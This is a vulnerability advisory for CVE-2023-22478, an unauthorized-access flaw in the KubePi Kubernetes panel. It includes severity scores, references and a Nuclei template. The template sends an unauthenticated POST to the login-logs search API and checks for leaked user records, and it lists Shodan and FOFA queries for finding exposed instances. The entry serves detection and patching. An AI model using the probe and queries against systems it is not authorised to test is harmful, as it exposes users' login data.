KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access

2023-08-0509:03:01

ProjectDiscovery

github.com

kubepi

kubernetes

unauthorized access

sensitive information

fit2cloud

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

7.2

Confidence

High

EPSS

0.124

Percentile

95.5%

JSON

KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.

id: CVE-2023-22478

info:
  name: KubePi <= v1.6.4 LoginLogsSearch - Unauthorized Access
  author: DhiyaneshDk
  severity: high
  description: |
    KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.
  impact: |
    An attacker can gain unauthorized access to sensitive information.
  remediation: |
    Upgrade KubePi to a version higher than v1.6.4 to mitigate the vulnerability.
  reference:
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22478
    - https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4
    - https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6
    - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22478
    cwe-id: CWE-862
    epss-score: 0.07825
    epss-percentile: 0.94208
    cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fit2cloud
    product: kubepi
    shodan-query:
      - html:"kubepi"
      - http.html:"kubepi"
    fofa-query:
      - "kubepi"
      - body="kubepi"
  tags: cve2023,cve,kubepi,k8s,exposure,fit2cloud

http:
  - raw:
      - |
        @timeout 10
        POST /kubepi/api/v1/systems/login/logs/search?pageNum=1&&pageSize=10 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"apiVersion":'
          - '"uuid":'
          - '"userName":'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100841f75f7adf2389cf7a570922f44d7110997635e8309b7f0425d409e109c43cf022100827826a9ea50e2a08cd006fdcb484b4b19ec720844111041640be6e0c75717fe:922c64590222798bb761d5b6d8e72950

References

github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4

github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6

github.com/KubeOperator/KubePi/releases/tag/v1.6.4

github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md

nvd.nist.gov/vuln/detail/CVE-2023-22478